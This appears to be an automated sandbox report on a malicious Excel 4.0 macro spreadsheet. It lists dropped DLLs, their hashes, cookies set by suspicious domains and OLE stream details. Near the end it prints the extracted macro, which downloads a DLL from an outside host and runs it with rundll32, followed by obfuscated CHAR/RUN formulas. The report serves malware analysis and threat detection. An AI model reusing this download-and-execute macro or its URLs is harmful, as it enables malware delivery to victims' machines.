	The Mental Health Center.xlsx	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	Remittance Advice 117301.xlsx	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	SC-TR1167700000.xlsx	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	PAYMENT INFO.xlsx	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	case (348).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	RefTreeAnalyserXL.xlam	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	case (426).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	case (250).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	case (1447).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	case (850).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109
	SecuriteInfo.com.Heur.18472.xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 172.67.200.147 172.67.198.109

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\Ida\suicy.dll	case (2553).xls	Get hash	malicious	Browse
	case (2553).xls	Get hash	malicious	Browse
	case (1057).xls	Get hash	malicious	Browse
	case (4374).xls	Get hash	malicious	Browse
	case (4335).xls	Get hash	malicious	Browse
	case (1522).xls	Get hash	malicious	Browse
	case (4374).xls	Get hash	malicious	Browse
	case (166).xls	Get hash	malicious	Browse
C:\ProgramData\formnet.dll	case (2553).xls	Get hash	malicious	Browse
	case (2553).xls	Get hash	malicious	Browse
	case (1057).xls	Get hash	malicious	Browse
	case (4374).xls	Get hash	malicious	Browse
	case (4335).xls	Get hash	malicious	Browse
	case (1522).xls	Get hash	malicious	Browse
	case (4374).xls	Get hash	malicious	Browse
	case (166).xls	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll	case (2553).xls	Get hash	malicious	Browse
	case (2553).xls	Get hash	malicious	Browse
	case (1057).xls	Get hash	malicious	Browse
	case (4374).xls	Get hash	malicious	Browse
	case (4335).xls	Get hash	malicious	Browse
	case (1522).xls	Get hash	malicious	Browse
	case (4374).xls	Get hash	malicious	Browse
	case (166).xls	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\formnet.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	933888
Entropy (8bit):	6.687983171155114
Encrypted:	false
SSDEEP:	24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
MD5:	B0F3FA047F6AE39A145FD364F693638E
SHA1:	1951696D8ACA4A31614BB68F9DA392402785E14E
SHA-256:	0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
SHA-512:	86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
Malicious:	true
Joe Sandbox View:	Filename: case (2553).xls, Detection: malicious, Browse Filename: case (2553).xls, Detection: malicious, Browse Filename: case (1057).xls, Detection: malicious, Browse Filename: case (4374).xls, Detection: malicious, Browse Filename: case (4335).xls, Detection: malicious, Browse Filename: case (1522).xls, Detection: malicious, Browse Filename: case (4374).xls, Detection: malicious, Browse Filename: case (166).xls, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	933888
Entropy (8bit):	6.687983171155114
Encrypted:	false
SSDEEP:	24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
MD5:	B0F3FA047F6AE39A145FD364F693638E
SHA1:	1951696D8ACA4A31614BB68F9DA392402785E14E
SHA-256:	0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
SHA-512:	86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
Malicious:	true
Joe Sandbox View:	Filename: case (2553).xls, Detection: malicious, Browse Filename: case (2553).xls, Detection: malicious, Browse Filename: case (1057).xls, Detection: malicious, Browse Filename: case (4374).xls, Detection: malicious, Browse Filename: case (4335).xls, Detection: malicious, Browse Filename: case (1522).xls, Detection: malicious, Browse Filename: case (4374).xls, Detection: malicious, Browse Filename: case (166).xls, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	https://rnollg.com/kev/scfrd.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\FFDE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	59779
Entropy (8bit):	7.76990481728098
Encrypted:	false
SSDEEP:	768:SwGBP++aB0WviH/WoTXZSzrSimIbCVpoWpgffXfQ9DP:SwmW+aB3viH/WaI5xGVpoWpgE
MD5:	A7D9C3771F2032417EBF7EA7F6A37E0B
SHA1:	0EA30CB7C635AD1CB26C0767432A89B4C22B7A96
SHA-256:	AB84812A4AEF4C0CA9D12B53FC4D27BFA06CE14F4FE3CDD98A90F783A5570F01
SHA-512:	1A902A4B44ECD49F6882823EF7ABB0C89D8AFE260715575532892AC6877D8166A74D77A14EF01799F89B4EB0AB93A9500F0F7EAD8834E1291EECE2FFF67F49F1
Malicious:	false
Reputation:	low
Preview:	..n.0...'..".N...v.z.u.[.v.`.Cb...........U{n.....I.I...U.d..2zJX1"...H..).s.3?'..BK...S..O.g.?Ln..\|.....:...R_..._..:.,.kE.?]E.(....G.3Z..@.<..d6...q..j.oo..&...sIjJ...E.F.{".Y,T..wml]x.@H_...).SQ..@.qc...VW{..M........W.cs;."Vv[..S.....r\|.....:%!.....m..]5.....eq.I.f.sX.....V..\i1o ......Q..J=.Nl..Su.L..P.......@....}..c$>>#.....3$>.".q......l...s...$cX..0.a..BU.....W...2,d.X....c!+.BV.....Y9..r,d.X...u....."k.a....r.].....u....*l..)....1F.^....{\|H'.....x...N..L....cl.`.....T....\P....%j;..&...KB!.....m...........PK..........!..0O.&...........[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Ida\suicy.dll Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	933888
Entropy (8bit):	6.687983171155114
Encrypted:	false
SSDEEP:	24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
MD5:	B0F3FA047F6AE39A145FD364F693638E
SHA1:	1951696D8ACA4A31614BB68F9DA392402785E14E
SHA-256:	0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
SHA-512:	86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
Malicious:	false
Joe Sandbox View:	Filename: case (2553).xls, Detection: malicious, Browse Filename: case (2553).xls, Detection: malicious, Browse Filename: case (1057).xls, Detection: malicious, Browse Filename: case (4374).xls, Detection: malicious, Browse Filename: case (4335).xls, Detection: malicious, Browse Filename: case (1522).xls, Detection: malicious, Browse Filename: case (4374).xls, Detection: malicious, Browse Filename: case (166).xls, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 27 11:09:42 2021, atime=Wed Jan 27 11:09:42 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.481405608311833
Encrypted:	false
SSDEEP:	12:85QQ/CLgXg/XAlCPCHaXgzB8IB/woOX+WnicvbabDtZ3YilMMEpxRljKJ6TdJP9O:85nU/XTwz6IJOYeiDv3q6irNru/
MD5:	1A44E1DFFB97FA24D8BC41E9E0017B62
SHA1:	15E8A00C0E558BE10FF2C205566D065965BA385B
SHA-256:	1A5E59005FC31F97D449F049015FF1F187C63EAEB40D37C1D345A0AF8B6FD42B
SHA-512:	8F6CD075914EC07EFDAAFD5454C259CDC1BD3F8990227275C6E57CFF856504B05893D5A10414B6E6EA439A05AD7DE528D8261568808F1EA7FA4837E2BABCD155
Malicious:	false
Reputation:	low
Preview:	L..................F...........7G..W..K....W..K..... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....;R6a..Desktop.d......QK.X;R6a..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\376483\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......376483..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Heur.30497.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jan 27 11:09:32 2021, mtime=Wed Jan 27 11:09:42 2021, atime=Wed Jan 27 11:09:42 2021, length=99328, window=hide
Category:	dropped
Size (bytes):	4396
Entropy (8bit):	4.567911708275409
Encrypted:	false
SSDEEP:	96:86/XLIxOn+tQh26/XLIxOn+tQh2V/XLIxOn+tQh2V/XLIxOn+tQ/:8IIKwQEIIKwQElIKwQElIKwQ/
MD5:	23AB55100C14FFD6047D25463B37E0C5
SHA1:	25F90F80B15416D16AFD468F40BE211743B6904B
SHA-256:	1245BA7C17CFF70407811B455439ACA6D9797BE44BF50F159D6C37F0FF252FE2
SHA-512:	799ACE3E52EC0086D4C2B14ADD88650573B6FBDA56118FFD830E5D2A3805FBEFD6C5B8931BB6AAA5AE115ACA6B235292A5FC75C763C9B4928C0729ABA8148F08
Malicious:	false
Reputation:	low
Preview:	L..................F.... ....vsE....W..K....w..K.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....;R1a..Desktop.d......QK.X;R1a..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.&d..;R2a .SECURI~1.XLS..l......;R1a;R1a.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...3.0.4.9.7...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\376483\Users.user\Desktop\SecuriteInfo.com.Heur.30497.xls.6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...3.0.4.9.7...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	288
Entropy (8bit):	4.760481812020176
Encrypted:	false
SSDEEP:	3:oyBVomM0bWd6luscbWd6lmM0bWd6luscbWd6lmM0bWd6luscbWd6lmM0bWd6lv:dj608n8o08n8o08n8o08I
MD5:	9AD192B0D52EAE71507C1735C57419A1
SHA1:	E173FFAC7D0CFF384D3450B59DEC3674CE23BA28
SHA-256:	E17EBF86E399E97A92D604BC6AA68E6A2CA6E01B7A62EBA256F96FEA9B7757D1
SHA-512:	F92FC8CB5C34255BA5D5B46A88EB1179E2E15CFD83E6DE2E78F459AF307855484CE278067DE697A08DF6CF8ED73B0A4A11207C9817C16F572CA3E1BA368A681B
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[xls]..SecuriteInfo.com.Heur.30497.LNK=0..SecuriteInfo.com.Heur.30497.LNK=0..[xls]..SecuriteInfo.com.Heur.30497.LNK=0..SecuriteInfo.com.Heur.30497.LNK=0..[xls]..SecuriteInfo.com.Heur.30497.LNK=0..SecuriteInfo.com.Heur.30497.LNK=0..[xls]..SecuriteInfo.com.Heur.30497.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\03IOIHRV.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	114
Entropy (8bit):	4.413749198597451
Encrypted:	false
SSDEEP:	3:GmM/Gp4HyUEKUTv4Mdl1cSncmbWg6gQln:XM/XyUEKUj4qlVcmb96Xn
MD5:	280A16E1B8DB58223E13F4709898028A
SHA1:	CFA2C1517C522E858AE088ABF9E00B7D524667A2
SHA-256:	0B0840333DBBECCD5FC9275961D2402EAB1CF74018D5D1C4DCFAA3498DA1E7DD
SHA-512:	0F66F6BC58D7CF1E8EADA8E57CC407AB41C30CD69423179C7290FC0C6383EB363DD0556B5F4EC8DC0AF9DAC2C27EDFE0B0CDD7C9C6C41A24F95343D0652DA1E6
Malicious:	false
Reputation:	low
IE Cache URL:	govemedico.tk/
Preview:	__cfduid.dc4013be8f84b92a24dd61ed36d78733f1611717042.govemedico.tk/.9728.4149093632.30870508.313104246.30864550.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0RM1C1X2.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	118
Entropy (8bit):	4.4950508645985945
Encrypted:	false
SSDEEP:	3:GmM/AGASo1E0HcSjUSTvaWqKJpKfcSNFcmacCXWYiQln:XM/AG3o1DHDjdqv0nm+Vn
MD5:	6E8ACE4E3302E2CE0B5C090CB4ED4112
SHA1:	846E75D52B6FB67ADB80F273619099297842CD78
SHA-256:	955F4B80E7DFBF8CDE2AE8222CC4882287CAA1FF3C5AFC03B3E3EBC68E8E2C5E
SHA-512:	211EF2ECE8468660765A4B10451DDEA1B4979F2D7967760CE66EAA71C44F1F39EA1DD93721FF36D23DD31BB93CC7F78B102172031B6F0244E9AB9C88002C8803
Malicious:	false
Reputation:	low
IE Cache URL:	homesoapmolds.com/
Preview:	__cfduid.dbe375a4c3b7a9d214ba1b08c7b2265721611717042.homesoapmolds.com/.9728.4149093632.30870508.306552234.30864550.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\HPDR9FYI.txt Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	112
Entropy (8bit):	4.476251353015926
Encrypted:	false
SSDEEP:	3:GmM/mgEG7SwfvwdUmoGT0cSN1m2OgQRcvXn:XM/X7XmUmoSYmp7c/
MD5:	555DAC8B81F26FB082BBDA1653CC5566
SHA1:	DF955551DE8639C59E5C5894A7C5228E36E7E70B
SHA-256:	A6FB6F91512552CA807B933C60E58544CD021551408A933318329F0BC387D8C9
SHA-512:	06A79DD9F38EE659C3EDEED65F3126A100A72ECD8FA47201DFD9EE32C0AC3D2851F98C52BB486C2A516B16ECD1742DCAAC74DA50747508BD8E1D3736AB608820
Malicious:	false
Reputation:	low
IE Cache URL:	rnollg.com/
Preview:	__cfduid.defbeab7f64597ca8f3d0e17546ea04381611717009.rnollg.com/.9728.3819093632.30870508.1276266950.30864549.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\SZU335ZX.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	116
Entropy (8bit):	4.465566043137573
Encrypted:	false
SSDEEP:	3:GmM/wIVfIQ5dsoLUSQvCfKw2lSNeVnJa+FvgQQln:XM/wIn5dsIQcKweLmn
MD5:	C3506F4CD1069F521F0525695B81DE97
SHA1:	D8934DD7C1DE658F4EC4FA283419691C8AAC1E4D
SHA-256:	076377819952C20515418852C8FA01388ACBBBADF371DA22255BC2AE766AC852
SHA-512:	C2820EADC52A6269CCF34B14068F38F1B6739F58DAC9738352C5976A17DCA1B9BCEE86693E79B21FC423C536923C5B89D8D2B8DB8D0D4A1CDB357D13BDA67725
Malicious:	false
Reputation:	low
IE Cache URL:	gadgetswolf.com/
Preview:	__cfduid.db876a0ff145337e89c4a64e084a47aa01611717041.gadgetswolf.com/.9728.4139093632.30870508.300156223.30864550.*.

C:\Users\user\Desktop\D0EE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	173366
Entropy (8bit):	5.331160426572254
Encrypted:	false
SSDEEP:	3072:9xrtdAOtyoVlDGUUlEfblBiPP58LmlPi+aEvthlhaEv9hE6DxrtdAOtyoVlDGUU8:9xrtdAOtyoVlDGUUlEfblBeP52mlPi+t
MD5:	102877D8CAA21F584D113C42EC0399C1
SHA1:	40D8DA62B958550147FFCD15AB5BE7F2731C179D
SHA-256:	A36D04B51C59895B68EC58AFB95074BFF35E95E83B42E4FD5783566D11499D74
SHA-512:	45199AFC9CB001D265A08327DEE4385B27E78320FB829C5F805FF0E87156ACC8E58EAE2F872F5C3FEBFF8A1981E4B3FA721E318F35BE6B4F34BE08F8FA7C991E
Malicious:	false
Preview:	........g2..........................\.p....user B.....a.........=.@............................................................... .....................................=........K.$8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.o.r.b.e.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.(.@...............C.o.r.b.e.l. .L.i.g.h.t.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...@...,...........C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1.(.0...............C.o.r.b.e.l. .L.i.g.h.t.1.(.0...>...........C.o.r.b.e.l. .L.i.g.h.t.1.(.....>...........C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...0...............C.a.

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: , Last Saved By: , Name of Creating Application: Microsoft Excel, Last Printed: Tue Jan 26 16:17:13 2021, Create Time/Date: Thu Apr 23 13:26:24 2020, Last Saved Time/Date: Tue Jan 26 16:28:15 2021, Security: 0
Entropy (8bit):	3.873783584079212
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	SecuriteInfo.com.Heur.30497.xls
File size:	156710
MD5:	26f124898bf4a54f4c110bb58b3f38c4
SHA1:	a3eaad9a0cb49e8e12678c9e82d93e53d7d38008
SHA256:	989e829731d55da1c9f0afdcebd1de9df19bfa1ff8935cee7b0eb8f1b5378fc5
SHA512:	dbaf2a730c0bb58e343610b610b9385d0061dc66b0eb8960722c06291ff942a7a3dd0e19f714a04a9b3771c46ae10b42acc15051bb9a5fd397660dcafc177026
SSDEEP:	3072:49SUz4tH8vsderSh1yRNJd6zAtH8U5BXKjBPWlyTSgG+g17:49SUz4tH8vsderSh1yRNJdaAtH8U5B6u
File Content Preview:	........................>.......................0...........................-......./..........................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "SecuriteInfo.com.Heur.30497.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Code Page:	1251
Author:
Last Saved By:
Last Printed:	2021-01-26 16:17:13
Create Time:	2020-04-23 12:26:24
Last Saved Time:	2021-01-26 16:28:15
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.843601759481
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . ( . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j S R F q S o B P w O . . . . . M a c r o 2 . . . . . M a c r o 3 . . . . . M a c r o 4 . . . . . M a c r o 5 . . . . . M a c r o 6 . . . . . M a c r o 7 . . . . . M a c r o 8 . . . . . M a c r o 9 . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 28 02 00 00 06 00 00 00 01 00 00 00 38 00 00 00 0f 00 00 00 40 00 00 00 0b 00 00 00 4c 00 00 00 10 00 00 00 54 00 00 00 0d 00 00 00 5c 00 00 00 0c 00 00 00 e7 01 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 0b 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.362148031008
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . . g j . . . @ . . . . 9 . ? . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 68 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 02 00 00 00 e3 04 00 00

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145752

General
Stream Path:	Book
File Type:	Applesoft BASIC program data, first line number 8
Stream Size:	145752
Entropy:	3.94377585798
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . L G u P G w K V E D q c E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . = . . . . . . . . Z . $ 8 .
Data Raw:	09 08 08 00 00 05 05 00 04 3d cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0e c0 ed e4 f0 e5 e9 20 c5 eb e8 f1 e5 e5 e2 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

CALL(URLMON, URLDownloadToFileA, "JJCCJJ", 0, "https://rnollg.com/kev/scfrd.dll", C:\ProgramData\BysKIez.dll, 0, 0)
CALL(Shell32, ShellExecuteA, "JJCCCCJ", 0, Open, "rundll32.exe", C:\ProgramData\BysKIez.dll, DllRegisterServer", 0, 0)

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR($FJ$1168-11),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($HL$1475),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($GW$1647),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,84,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,